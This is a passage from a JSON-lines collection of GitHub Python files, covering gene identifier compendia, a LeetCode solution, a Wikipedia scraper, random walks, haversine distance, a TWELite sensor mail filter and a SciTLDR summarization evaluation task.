json.load(inf)\n with open(outfile,'w') as outf:\n for gene in hgnc_json['response']['docs']:\n outf.write(f\"{gene['hgnc_id']}\\n\")\n\n\ndef write_omim_ids(infile,outfile):\n with open(infile,'r') as inf, open(outfile,'w') as outf:\n for line in inf:\n if line.startswith('#'):\n continue\n chunks = line.split('\\t')\n if chunks[1] == 'gene':\n outf.write(f'{OMIM}:{chunks[0]}\\n')\n\ndef write_umls_ids(mrconso, mrsty, outfile):\n \"\"\"Find the UMLS entities that are genes. This is complicated by the fact that UMLS semantic type doesn't\n have a corresponding GENE class. It has something (A1.2.3.5) which includes genes, but also includes genomes and\n variants and gene properties and gene families. We can do some filtering by looking around in the MRCONSO as well\n as the MRSTY. In particular, if the term maps to an OMIM that has a period in it, then it's a variant. Good job\n UMLS, it's not like genes are central to biology or anything.\n Also, remove anything that in the label identifies itself as an Allele or Mutation\n It's possible in the future that we'd like to try to assign better classes to some of these things.\"\"\"\n\n\n #Do I want this? There are a bunch of things under here that we probably don't want.\n blacklist=set(['C0017361', #recessive genes\n 'C0017346', #Gag viral gene family\n ])\n umls_keepers = set()\n with open(mrsty, 'r') as inf:\n for line in inf:\n x = line.strip().split('|')\n cat = x[2]\n if cat == 'A1.2.3.5':\n umls_keepers.add(x[0])\n umls_keepers.difference_update(blacklist)\n #Now filter out OMIM variants\n with open(mrconso,'r') as inf:\n for line in inf:\n x = line.strip().split('|')\n cui = x[0]\n if cui not in umls_keepers:\n continue\n lang = x[1]\n #Only keep english terms\n if lang != 'ENG':\n continue\n #only keep unsuppressed rows\n suppress = x[16]\n if suppress == 'O' or suppress == 'E':\n continue\n #only keep sources we're looking for\n source = x[11]\n if source == 'OMIM':\n value = x[13]\n if \".\" in value:\n umls_keepers.remove(x[0])\n if 'Allele' in x[14] or 'Mutation' in x[14]:\n umls_keepers.remove(x[0])\n with open(outfile,'w') as outf:\n for umls in umls_keepers:\n outf.write(f'{UMLS}:{umls}\\t{GENE}\\n')\n\ndef read_ncbi_idfile(ncbi_idfile):\n ncbi_ids = set()\n with open(ncbi_idfile,'r') as inf:\n for line in inf:\n x = line.strip().split('\\t')[0]\n ncbi_ids.add(x)\n return ncbi_ids\n\ndef build_gene_ncbi_ensembl_relationships(infile,ncbi_idfile,outfile):\n ncbi_ids = read_ncbi_idfile(ncbi_idfile)\n with gzip.open(infile,'r') as inf, open(outfile,'w') as outf:\n h = inf.readline()\n last = ('','')\n for line in inf:\n x = line.decode('utf-8').strip().split('\\t')\n ncbigene_id = f'{NCBIGENE}:{x[1]}'\n if ncbigene_id not in ncbi_ids:\n continue\n ensembl_id = f'{ENSEMBL}:{x[2]}'\n new = (ncbigene_id,ensembl_id)\n if new == last:\n continue\n outf.write(f'{ncbigene_id}\\teq\\t{ensembl_id}\\n')\n last=new\n\n # If the ENSEMBL ID is a version string (e.g. ENSEMBL:ENSP00000263368.3),\n # then we should indicate that this is identical to the non-versioned string\n # as well.\n # See https://github.com/TranslatorSRI/Babel/issues/72 for details.\n res = re.match(r\"^([A-Z]+\\d+)\\.\\d+\", x[2])\n if res:\n ensembl_id_without_version = res.group(1)\n outf.write(f'{ncbigene_id}\\teq\\t{ENSEMBL}:{ensembl_id_without_version}\\n')\n\ndef build_gene_ncbigene_xrefs(infile,ncbi_idfile,outfile):\n mappings = {'WormBase': WORMBASE, 'FLYBASE': FLYBASE, 'ZFIN': ZFIN,\n 'HGNC': HGNC, 'MGI': MGI, 'RGD': RGD, 'dictyBase': DICTYBASE,\n 'SGD': SGD }\n ncbi_ids = read_ncbi_idfile(ncbi_idfile)\n with gzip.open(infile, 'r') as inf, open(outfile, 'w') as outf:\n h = inf.readline()\n for line in inf:\n x = line.decode('utf-8').strip().split('\\t')\n ncbigene_id = f'{NCBIGENE}:{x[1]}'\n if ncbigene_id not in ncbi_ids:\n continue\n xrefs = x[5].split('|')\n for xref in xrefs:\n if xref == '-':\n continue\n xref_parts = xref.split(':')\n found_prefix=xref_parts[0]\n if found_prefix in mappings:\n outf.write(f'{ncbigene_id}\\txref\\t{mappings[found_prefix]}:{xref_parts[-1]}\\n')\n\ndef build_gene_medgen_relationships(infile,outfile):\n with open(infile, 'r') as inf, open(outfile, 'w') as outf:\n h = inf.readline()\n for line in inf:\n x = line.strip().split('\\t')\n if not x[2] == 'gene':\n continue\n ncbigene_id = f'{NCBIGENE}:{x[1]}'\n omim_id = f'{OMIM}:{x[0]}'\n outf.write(f'{ncbigene_id}\\teq\\t{omim_id}\\n')\n #It looks like this never gets invoked - these columns are only filled in for phenotypes\n if not x[4] == '-':\n umls_id = f'{UMLS}:{x[4]}'\n outf.write(f'{ncbigene_id}\\teq\\t{umls_id}\\n')\n\ndef write_ensembl_ids(ensembl_dir, outfile):\n \"\"\"Loop over all the ensembl species. Find any protein-coding gene\"\"\"\n with open(outfile,'w') as outf:\n #find all the ensembl directories\n dirlisting = os.listdir(ensembl_dir)\n for dl in dirlisting:\n dlpath = os.path.join(ensembl_dir,dl)\n if os.path.isdir(dlpath):\n infname = os.path.join(dlpath,'BioMart.tsv')\n if os.path.exists(infname):\n #open each ensembl file, find the id column, and put it in the output\n with open(infname,'r') as inf:\n wrote=set()\n h = inf.readline()\n x = h[:-1].split('\\t')\n gene_column = x.index('Gene stable ID')\n protein_column = x.index('Protein stable ID')\n for line in inf:\n x = line[:-1].split('\\t')\n #Is it protein coding?\n #if x[protein_column] == '':\n # continue\n gid = f'{ENSEMBL}:{x[gene_column]}'\n #The gid is not unique, so don't write the same one over again\n if gid in wrote:\n continue\n wrote.add(gid)\n outf.write(f'{gid}\\n')\n\n\ndef build_gene_umls_hgnc_relationships(mrconso, umls_idfile, outfile):\n #Could also add MESH, if that were a valid gene prefix\n umls.build_sets(mrconso, umls_idfile, outfile, {'HGNC':HGNC})\n\ndef build_gene_compendia(concordances, identifiers, icrdf_filename):\n \"\"\":concordances: a list of files from which to read relationships\n :identifiers: a list of files from which to read identifiers and optional categories\"\"\"\n dicts = {}\n types = {}\n uniques = [NCBIGENE,HGNC,ENSEMBL,OMIM]\n for ifile in identifiers:\n print('loading',ifile)\n new_identifiers, new_types = read_identifier_file(ifile)\n glom(dicts, new_identifiers, unique_prefixes= uniques)\n types.update(new_types)\n for infile in concordances:\n print(infile)\n print('loading', infile)\n pairs = []\n with open(infile, 'r') as inf:\n for line in inf:\n x = line.strip().split('\\t')\n pairs.append(set([x[0], x[2]]))\n glom(dicts, pairs, unique_prefixes=uniques)\n gene_sets = set([frozenset(x) for x in dicts.values()])\n baretype = GENE.split(':')[-1]\n write_compendium(gene_sets, f'{baretype}.txt', GENE, {}, icrdf_filename=icrdf_filename)\n\n","repo_name":"TranslatorSRI/Babel","sub_path":"src/createcompendia/gene.py","file_name":"gene.py","file_ext":"py","file_size_in_byte":12328,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"74110788008","text":"class Solution:\r\n def minOperations(self, nums):\r\n inter = [0 for num in nums]\r\n nums = list(set(nums))\r\n nums.sort()\r\n i = 0\r\n j = 0\r\n min = nums[0]\r\n while i < len(nums):\r\n if nums[i] - min < len(inter):\r\n inter[j] = nums[i]\r\n del nums[i]\r\n j += 1\r\n else:\r\n i += 1\r\n return inter.count(0)\r\n\r\n\r\nif __name__ == '__main__':\r\n vals = [41,33,29,33,35,26,47,24,18,28]\r\n\r\n obj = Solution()\r\n print(obj.minOperations(vals))","repo_name":"UnStudentRoman/LeetCodeProblems","sub_path":"2009_Minimum_Number_of_Operations_to_Make_Array_Continuous.py","file_name":"2009_Minimum_Number_of_Operations_to_Make_Array_Continuous.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"143897553","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ## Template\n# MAGIC\n# MAGIC **Objective**: This notebook's objective is to explore the dataset and set the guidelines for modeling\n# MAGIC\n# MAGIC **Takeaways**: The key takeaways of this notebook are:\n# MAGIC\n# MAGIC - No missing values;\n# MAGIC - No zero values;\n# MAGIC - The target variable is not normal, but the features are near;\n# MAGIC - The target variable has high correlation with the features;\n# MAGIC - The categorical feature maybe will be of value (But dummy variables can reduce the model performance)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 1.0 Imports\n\n# COMMAND ----------\n\n# MAGIC %run ../01_CONFIG/utils\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 2.0 Data Loading\n\n# COMMAND ----------\n\n#df = spark.sql(\"select * from default.fish_cleaned\").toPandas()\ndf = pd.read_csv(\"../Fish.csv\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 3.0 Profilling\n\n# COMMAND ----------\n\ndf.head()\n\n# COMMAND ----------\n\ndisplay(df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### 4.0 Data visualisation\n\n# COMMAND ----------\n\nsns.pairplot(data=df)\n\n# COMMAND ----------\n\nfig, axs = plt.subplots(figsize=(12, 8))\nsns.heatmap(data=df.corr(), annot=True)\nplt.show()\n\n# COMMAND ----------\n\n\n","repo_name":"micheldearaujo/artefact_mlflow_training","sub_path":"03_EDA/EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13523309200","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport pandas as pd\nfrom queue import Queue, Empty\nfrom concurrent.futures import ThreadPoolExecutor\nimport os\n\n\nclass Scraper:\n def __init__(self, max_num=50):\n self.max_num = max_num\n self.df = pd.DataFrame(columns=[\"text\", \"label\"])\n\n def __parse_links(self, html):\n soup = BeautifulSoup(html, 'html.parser')\n regex = re.compile(r'/wiki/.+')\n\n # Get article categories\n categories = soup.find(id=\"mw-normal-catlinks\")\n\n # Check if page contains categories (e.g. an image page does not have this information)\n if categories is None:\n return\n\n categories = categories.select('li a')\n # Continue only if articles contains the given category\n if any(self.category in cat.text.lower() for cat in categories):\n\n # Get article content\n text = ''\n for paragraph in soup.find_all('p'):\n text += paragraph.text\n\n # Drop footnote superscripts in brackets and Replace ‘\\n’ (a new line) with ‘’ (an empty string)\n text = re.sub(r'\\[.*?\\]+', '', text)\n text = text.replace('\\n', '')\n\n self.num += 1\n\n # Add article to dataframe\n self.df = self.df.append({\n \"text\": text,\n \"label\": self.category\n }, ignore_index=True)\n\n # Scrape other pages from links\n # Get all the links\n links = soup.find(id=\"bodyContent\").find_all(\"a\", {'href': True})\n\n for link in links:\n # Only interested in other wiki articles (remove external links and images)\n if re.match(regex, link.get('href')):\n self.to_crawl.put(\"https://en.wikipedia.org\" + link.get('href'))\n\n def __post_scrape_callback(self, res):\n result = res.result()\n if result and result.status_code == 200 and self.num < self.max_num:\n self.__parse_links(result.text)\n\n def __scrape_page(self, url):\n try:\n res = requests.get(url, timeout=(3, 30))\n return res\n except requests.RequestException:\n return\n\n def __run_scraper(self, base_urls, category):\n\n # Set initial values\n self.pool = ThreadPoolExecutor(max_workers=6)\n self.category = category\n self.scraped_pages = set([])\n self.to_crawl = Queue()\n # add base urls\n for url in base_urls:\n self.to_crawl.put(url)\n self.num = 0\n\n while True:\n try:\n target_url = self.to_crawl.get(timeout=60)\n # return if reached target number of articles\n if self.num > self.max_num:\n self.pool.shutdown(wait=False)\n return\n if target_url not in self.scraped_pages:\n #print(\"Scraping URL: {}\".format(target_url))\n self.scraped_pages.add(target_url)\n job = self.pool.submit(self.__scrape_page, target_url)\n job.add_done_callback(self.__post_scrape_callback)\n except Empty:\n return\n except Exception as e:\n print(e)\n continue\n\n def __clean_txt(self, text):\n text = re.sub(\"'\", \"\", text)\n text = re.sub(\"(\\\\W)+\", \" \", text)\n return text\n\n def get(self):\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Sport\"], \"sport\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Economy\"], \"economy\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Engineering\"], \"engineering\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/History\"], \"history\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Philosophy\"], \"philosophy\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Politics\"], \"politics\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Religion\"], \"religion\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Food\"], \"food\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Law\"], \"law\")\n self.__run_scraper([\"https://en.wikipedia.org/wiki/Culture\"], \"culture\")\n # Clean text\n self.df['text'] = self.df.text.apply(self.__clean_txt)\n self.df.to_pickle(\"data/dataframe.pkl\")\n return self.df\n\n def load(self):\n if os.path.isfile('data/dataframe.pkl'):\n return pd.read_pickle(\"data/dataframe.pkl\")\n else:\n return pd.DataFrame()\n","repo_name":"raikilon/articles-classification","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3341998208","text":"import numpy as np\nfrom .traverse import BaseTraverse\n\n\nclass RandomWalk(BaseTraverse):\n def _choose_next(self):\n node_transition_probs = self.transition_probs[self._active]\n if np.isclose(np.sum(node_transition_probs), 1):\n nxt = np.random.choice(self.n_verts, p=node_transition_probs)\n return nxt\n\n\ndef to_markov_matrix(adj):\n prob_mat = adj.copy()\n row_sums = prob_mat.sum(axis=1)\n row_sums[row_sums == 0] = 1 # plug the holes\n prob_mat = prob_mat / row_sums[:, np.newaxis]\n return prob_mat\n\n\ndef random_walks_from_node(\n start_ind,\n probs,\n stop_inds=[],\n max_depth=10,\n n_sims=1000,\n seed=None,\n n_bins=None,\n method=\"tree\",\n):\n pass\n\n\ndef generate_random_walks(\n prob_mat, from_inds, out_inds, n_walks=100, max_walk=25, return_stuck=False\n):\n n_verts = len(prob_mat)\n dead_inds = np.where(prob_mat.sum(axis=1) == 0)[0]\n stop_reasons = np.zeros(4)\n sm_paths = []\n visit_orders = {i: [] for i in range(n_verts)}\n for s in from_inds:\n for n in range(n_walks):\n curr_ind = s\n n_steps = 0\n path = [s]\n visit_orders[s].append(len(path))\n while (\n (curr_ind not in out_inds)\n and (n_steps <= max_walk)\n and (curr_ind not in dead_inds)\n ):\n next_ind = np.random.choice(n_verts, p=prob_mat[curr_ind])\n n_steps += 1\n curr_ind = next_ind\n path.append(curr_ind)\n visit_orders[curr_ind].append(len(path))\n if curr_ind in out_inds:\n stop_reasons[0] += 1\n sm_paths.append(path)\n elif curr_ind in dead_inds:\n stop_reasons[1] += 1\n if return_stuck:\n sm_paths.append(path)\n elif n_steps > max_walk:\n stop_reasons[2] += 1\n else:\n stop_reasons[3] += 1\n\n print(stop_reasons / stop_reasons.sum())\n print(len(sm_paths))\n return sm_paths, visit_orders\n\n\n# def _step(start, prob_mat, path, max_walk=30):\n# if len(path) < max_walk:\n# choice = np.random.choice(len(prob_mat), p=prob_mat[start])\n# path.append(choice)\n# return choice\n\n# def _random_walk(start, prob_mat, )\n# curr = start\n\n\n# if curr_ind in out_inds:\n# stop_reasons[0] += 1\n# sm_paths.append(path)\n# if curr_ind in dead_inds:\n# stop_reasons[1] += 1\n# if n_steps > max_walk:\n# stop_reasons[2] += 1\n\n","repo_name":"neurodata/maggot_models","sub_path":"src/traverse/random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"25390997398","text":"\nimport math\n\n\ndef degree_to_radian(degree):\n return 2 * degree * math.pi / 360\n\n\ndef harversine(initial_coord, final_coord):\n # Distance between two coordinates (in km).\n r = 6371\n initial_rads = list(map(degree_to_radian, initial_coord))\n final_rads = list(map(degree_to_radian, final_coord))\n delta_phi = final_rads[0] - initial_rads[0]\n delta_lambda = initial_rads[1] - final_rads[1]\n h = math.sin(delta_phi/2) ** 2 + \\\n math.cos(initial_rads[0]) * math.cos(final_rads[0]) * \\\n math.sin(delta_lambda / 2) ** 2\n return 2*r*math.asin(math.sqrt(h))\n\n\n","repo_name":"RHDZMOTA/weather-api","sub_path":"util/distance_operations.py","file_name":"distance_operations.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43430454825","text":"#\n# Day 7: The Treachery of Whales\n# https://adventofcode.com/2021/day/7\n#\nfrom collections import defaultdict\nfrom typing import List\n\n\ndef parse_line(line: str) -> List[int]:\n num_str_list = line.rstrip().split(\",\")\n return [int(c) for c in num_str_list]\n\n\ndef summation(target: int) -> int:\n return sum([i for i in range(1, target + 1)])\n\n\ndef calculate(lines: list[str]) -> int:\n positions = parse_line(lines[0])\n min_fuel_costs = defaultdict(int)\n max_position = max(positions)\n for i in range(len(positions)):\n for j in range(max_position):\n num_moves = abs(positions[i] - j)\n min_fuel_costs[j] += summation(num_moves)\n return min(min_fuel_costs.values())\n\n\nif __name__ == \"__main__\":\n with open(\"input.txt\") as f:\n lines = f.readlines()\n fuel_cost = calculate(lines=lines)\n print(f\"There minimum fuel cost is {fuel_cost}.\")\n","repo_name":"jeffharrington/advent-of-code-2021","sub_path":"advent7/advent7b.py","file_name":"advent7b.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37696453574","text":"\"\"\"\nTLDR: Extreme Summarization of Scientific Documents\nhttps://arxiv.org/abs/2004.15011\n\nThe SciTLDR dataset is created specifically to study the task of TLDR (Too Long; Didn't Read) \ngeneration for scientific papers. TLDR generation is a form of extreme summarization that requires \nhigh source compression, expertise, and a thorough understanding of domain-specific language.\n\nWe use the Abstract only setting of TLDR (where the input is only the abstract of the paper)\n\nHomepage: https://github.com/allenai/scitldr\n\"\"\"\nimport re\nfrom itertools import islice\n\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\nimport string\nfrom catwalk.dependencies.lm_eval.base import Task, rf\nfrom catwalk.dependencies.lm_eval.metrics import mean\nfrom datasets import load_metric\n\n_CITATION = \"\"\"\n@article{cachola2020tldr,\n title={{TLDR}: Extreme Summarization of Scientific Documents},\n author={Isabel Cachola and Kyle Lo and Arman Cohan and Daniel S. Weld},\n journal={arXiv:2004.15011},\n year={2020},\n}\n\"\"\"\n\n_ARTICLES = re.compile(r\"\\b(a|an|the)\\b\", re.UNICODE)\n\n\nclass SciTLDR(Task):\n VERSION = 0\n DATASET_PATH = \"scitldr\"\n DATASET_NAME = None\n\n def __init__(self):\n super().__init__()\n self.bertscore = load_metric(\"bertscore\")\n self.bertscore_model_type = \"microsoft/deberta-xlarge-mnli\"\n self.rouge = load_metric(\"rouge\")\n self.metric_keys = {} # will be populated by get_metrics and used for aggregation\n\n def has_training_docs(self):\n return True\n\n def has_validation_docs(self):\n return True\n\n def has_test_docs(self):\n return True\n\n def training_docs(self):\n # Cache training for faster few-shot.\n # Data is too large to fit in memory.\n if self._training_docs is None:\n self._training_docs = list(self.dataset[\"train\"])\n return self._training_docs\n\n def validation_docs(self):\n return self.dataset[\"validation\"]\n\n def fewshot_examples(self, k, rnd):\n # Data is too large to fit in memory. We just sample from the first bit.\n if self._training_docs is None:\n self._training_docs = list(islice(self.training_docs(), 0, 100000))\n\n return rnd.sample(self._training_docs, k)\n\n def doc_to_text(self, doc):\n source_sentences = doc[\"source\"]\n source = \" \".join(source_sentences)\n return f\"Article: {source}\\nTLDR:\"\n\n def should_decontaminate(self):\n return True\n\n def doc_to_decontamination_query(self, doc):\n return \" \".join(doc[\"source\"])\n\n def doc_to_target(self, doc):\n # we take the first target. this is used for fewshot\n summary = doc[\"target\"][0]\n return summary\n\n def construct_requests(self, doc, ctx):\n \"\"\"Uses RequestFactory to construct Requests and returns an iterable of\n Requests which will be sent to the LM.\n\n :param doc:\n The document as returned from training_docs, validation_docs, or test_docs.\n :param ctx: str\n The context string, generated by fewshot_context. This includes the natural\n language description, as well as the few shot examples, and the question\n part of the document for `doc`.\n \"\"\"\n conts = [rf.greedy_until(ctx, [\"\\n\"])]\n return conts\n\n def process_results(self, doc, results):\n \"\"\"Take a single document and the LM results and evaluates, returning a\n dict where keys are the names of submetrics and values are the values of\n the metric for that one document\n\n :param doc:\n The document as returned from training_docs, validation_docs, or test_docs.\n :param results:\n The results of the requests created in construct_requests.\n \"\"\"\n # minimal cleaning\n results = [res.replace(\"\\n\", \" \").replace(\"\\t\", \" \").replace(\"\\r\", \" \").strip() for res in results]\n preds, golds = results, doc[\"target\"]\n results = self.get_metrics(preds, golds)\n return results\n\n def get_metrics(self, predicted, gold_summaries):\n \"\"\" \"\"\"\n # each summary can have multiple golds\n # rouge_score of huggingface doesn't support passing multiple summaries\n # we split it into two instances\n predictions = []\n for _ in gold_summaries:\n predictions.append(predicted)\n\n rouge_results = self.rouge.compute(\n predictions=predictions,\n references=gold_summaries,\n use_stemmer=True,\n use_aggregator=False,\n rouge_types=[\"rouge1\", \"rouge2\", \"rougeL\", \"rougeLsum\"],\n )\n for key, value in rouge_results.items():\n rouge_results[key] = {\n \"precision\": [score.precision * 100 for score in value],\n \"recall\": [score.recall * 100 for score in value],\n \"fmeasure\": [score.fmeasure * 100 for score in value],\n \"precision_mean\": np.mean([score.precision for score in value]) * 100,\n \"precision_max\": np.max([score.precision for score in value]) * 100,\n \"recall_mean\": np.mean([score.recall for score in value]) * 100,\n \"recall_max\": np.max([score.recall for score in value]) * 100,\n \"fmeasure_mean\": np.mean([score.fmeasure for score in value]) * 100,\n \"fmeasure_max\": np.max([score.fmeasure for score in value]) * 100,\n }\n\n rouge_results[\"rouge_mean\"] = (\n rouge_results[\"rouge1\"][\"fmeasure_mean\"]\n + rouge_results[\"rouge2\"][\"fmeasure_mean\"]\n + rouge_results[\"rougeL\"][\"fmeasure_mean\"]\n ) / 3\n\n # useful for multi-target summaries (e.g., scitldr)\n rouge_results[\"rouge_mean_of_max\"] = (\n rouge_results[\"rouge1\"][\"fmeasure_max\"]\n + rouge_results[\"rouge2\"][\"fmeasure_max\"]\n + rouge_results[\"rougeL\"][\"fmeasure_max\"]\n ) / 3\n\n bert_score_results = self.bertscore.compute(\n predictions=predictions,\n references=gold_summaries,\n # These are mostly based on the recommendations in https://github.com/Tiiiger/bert_score\n model_type=self.bertscore_model_type,\n lang=\"en\",\n rescale_with_baseline=True,\n use_fast_tokenizer=True,\n )\n bert_score_results[\"f1_mean\"] = np.mean(bert_score_results[\"f1\"])\n bert_score_results[\"f1_max\"] = np.max(bert_score_results[\"f1\"])\n\n results = {\n \"rouge1_fmeasure_mean\": rouge_results[\"rouge1\"][\"fmeasure_mean\"],\n \"rouge1_fmeasure_max\": rouge_results[\"rouge1\"][\"fmeasure_max\"],\n \"rouge2_fmeasure_mean\": rouge_results[\"rouge2\"][\"fmeasure_mean\"],\n \"rouge2_fmeasure_max\": rouge_results[\"rouge2\"][\"fmeasure_max\"],\n \"rougeL_fmeasure_mean\": rouge_results[\"rougeL\"][\"fmeasure_mean\"],\n \"rougeL_fmeasure_max\": rouge_results[\"rougeL\"][\"fmeasure_max\"],\n \"rougeLsum_fmeasure_mean\": rouge_results[\"rougeLsum\"][\"fmeasure_mean\"],\n \"rougeLsum_fmeasure_max\": rouge_results[\"rougeLsum\"][\"fmeasure_max\"],\n \"bertscore_f1_mean\": bert_score_results[\"f1_mean\"],\n \"bertscore_f1_max\": bert_score_results[\"f1_max\"],\n }\n self.metric_keys = list(results.keys())\n return results\n\n def aggregation(self):\n \"\"\"\n :returns: {str: [float] -> float}\n A dictionary where keys are the names of submetrics and values are\n functions that aggregate a list of metrics\n \"\"\"\n return {metric_key: mean for metric_key in self.metric_keys}\n\n def higher_is_better(self):\n \"\"\"\n :returns: {str: bool}\n A dictionary where keys are the names of submetrics and values are\n whether a higher value of the submetric is better\n \"\"\"\n return {metric_key: True for metric_key in self.metric_keys}\n","repo_name":"allenai/catwalk","sub_path":"catwalk/dependencies/lm_eval/tasks/scitldr.py","file_name":"scitldr.py","file_ext":"py","file_size_in_byte":7935,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"21782765901","text":"#!/usr/bin/env python3\n# -*- mode:python; coding:utf-8 -*-\n\nimport time\nimport sys\nfrom datetime import datetime,timedelta\nimport syslog\nimport os\nimport struct\nimport binascii\nimport glob\nimport pprint\nfrom logging import getLogger,INFO,DEBUG,Formatter\nfrom logging.handlers import SysLogHandler\nfrom email.header import decode_header\nfrom email.parser import Parser\nimport smtplib\nimport email\nfrom email.mime.text import MIMEText\n\nOutDir = \"/var/run/twe\"\nRainMarker = OutDir + \"/RainMarker\"\n\nhandler = SysLogHandler(address = '/dev/log', facility=SysLogHandler.LOG_USER)\nhandler.setFormatter(Formatter(\"twe-filter[%(process)d]: %(message)s\"))\nhandler.setLevel(INFO)\nlogger = getLogger(\"twe-filter\")\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n\ndef decodeVolt(batt):\n volt = 0\n if batt <= 170:\n volt = 1950 + 5 * batt\n else:\n volt = 2800 + 10 * (batt - 170)\n return volt\n\ndef notifyStats(weather, voltage, results, toAddr):\n fromAddr=\"twe@localhost\"\n if 'MAIL_FROM' in os.environ:\n fromAddr = os.environ['MAIL_FROM']\n closed = \",\".join(sorted([chr(0x40 + v[\"id\"]) for v in results if v[\"pkt\"] == 254 and v[\"button\"] == 1]))\n opened = \",\".join(sorted([chr(0x40 + v[\"id\"]) for v in results if v[\"pkt\"] == 254 and v[\"button\"] == 0]))\n text = \"\\n\".join([weather, voltage, \"\", \" Opened: \" + opened, \" Closed: \" + closed])\n msg = MIMEText(text)\n msg['Subject'] = weather\n msg['From'] = fromAddr\n msg['To'] = toAddr\n recipients = toAddr.split(',')\n s = smtplib.SMTP()\n s.connect()\n s.sendmail(fromAddr, recipients, msg.as_string())\n s.close()\n\ndef collectDoorStatus():\n results = {}\n file_list = glob.glob(OutDir + \"/8*\")\n for f in file_list:\n if f.endswith(\".parsed\"):\n continue\n raw = open(f, \"r\")\n rx = raw.readline()\n parsed = parseTWELite(rx)\n if \"from\" in parsed:\n src = parsed[\"from\"]\n results[src] = parsed\n return results\n\ndef checkRain(parsed, results, rcpt):\n adc2 = int(parsed[\"adc2\"])\n volt = int(parsed[\"volt\"])\n ratio = float(adc2) / volt\n subject = \"The weather\"\n weather = \"\"\n if ratio < 0.5:\n # It's rain\n weather = \"It's rain.\"\n else:\n weather = \"It's NOT rain.\"\n voltage = \" adc2:{0:d}mV, volt:{1:d}mV\".format(adc2, volt)\n notifyStats(weather, voltage, results, rcpt)\n\ndef reportStats(results, rcpt):\n for parsed in results:\n if parsed[\"pkt\"] == 0x10:\n checkRain(parsed, results, rcpt)\n break\n \n\n# Decode output of vSerOutput_Uart().\ndef parseTWELite(raw):\n if raw[0] != \":\":\n return {}\n data = binascii.unhexlify(raw[1:])\n pkt = raw[25:27]\n result = None\n\n if pkt == '10':\n logger.debug(\"Received %s\", raw)\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,PC1,PC2,CRC\n ss10 = struct.Struct(\">IBHIBBBHHHHB\")\n parsed = ss10.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"PC1\" : parsed[9],\n \"PC2\" : parsed[10],\n \"updated\" : datetime.now()\n }\n elif pkt == 'FE':\n # relay,LQI,FRAME,src,u8id,u8pkt,batt,adc1,adc2,param,DIbitmap,CRC\n ssFE = struct.Struct(\">IBHIBBBHHBBB\")\n parsed = ssFE.unpack(data)\n\n volt = decodeVolt(parsed[6])\n\n result = {\n \"relay\" : \"{0:08X}\".format(parsed[0]),\n \"lqi\" : parsed[1],\n \"frame\" : parsed[2],\n \"from\" : \"{0:08X}\".format(parsed[3]),\n \"id\": parsed[4],\n \"pkt\": parsed[5],\n \"volt\": volt,\n \"vc2\" : 2 * parsed[7],\n \"adc2\" : parsed[8],\n \"param\" : parsed[9],\n \"button\" : parsed[10],\n \"updated\" : datetime.now()\n }\n return result\n\ndef main():\n raw = sys.stdin.readlines()\n msg = email.message_from_string(''.join(raw))\n (name, fromAdddr) = email.utils.getaddresses(msg.get_all('From',''))[0]\n recipients=\"twe@localhost\"\n if 'RCPT_TO' in os.environ:\n recipients = os.environ['RCPT_TO']\n if fromAdddr in recipients.split(','):\n ioResults = collectDoorStatus()\n reportStats(ioResults.values(), fromAdddr)\n else:\n logger.warn(\"Unknown recipeint %s.\", fromAdddr)\n return\n \nif __name__ == '__main__':\n if not os.path.exists(OutDir):\n sys.exit(0)\n try:\n main()\n except Exception as e:\n logger.error('twe-filter.py', exc_info=True)\n","repo_name":"true-nature/App_DoorChecker","sub_path":"RaspberryPi/usr/local/bin/twe-filter.py","file_name":"twe-filter.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13198811809","text":"import random\nimport pytest\nimport copy\nimport collections\n\nfrom pymtl import *\nfrom pclib.test import run_test_vector_sim\n\nclass CPU_TOP(VerilogModel):\n\tdef __init__(s):\n\t\ts.debug = InPort(1)\n\t\ts.inr = InPort(3)\n\t\ts.outvalue = OutPort(16)\n\t\ts.pc = 